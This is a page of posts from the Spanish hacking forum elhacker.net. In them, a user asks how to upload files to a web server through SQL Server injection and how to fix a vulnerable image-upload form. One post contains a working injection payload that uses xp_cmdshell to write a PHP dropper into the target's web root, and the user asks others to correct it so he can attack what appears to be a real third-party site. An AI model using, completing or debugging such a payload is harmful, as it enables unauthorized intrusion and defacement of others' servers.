elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: 1 2 [3]
21  Seguridad Informática / Nivel Web / Pregunta sobre inyeccion sqlserver. en: 18 Febrero 2010, 04:07 am
Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM
22  Seguridad Informática / Nivel Web / pregunta v2 , sql server en: 19 Noviembre 2009, 22:43 pm
hola

yo queria atravez de sql server , de una iyneccion en las bases de datos de una web
que corre por sql server
queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.


'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^>  > C:\AppServ\www\update.php'--

Queria subir el archivo update,con el siguiente codigo .

Gracias de antemano

el individuo usa appserver
23  Seguridad Informática / Nivel Web / pregunta .. upload vulnerable. en: 19 Noviembre 2009, 22:17 pm
hola

 como fixeo un upload de imagenes vulnerable a que pueda subir un archivo .php , desde las cabezeras http?

saludos

Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines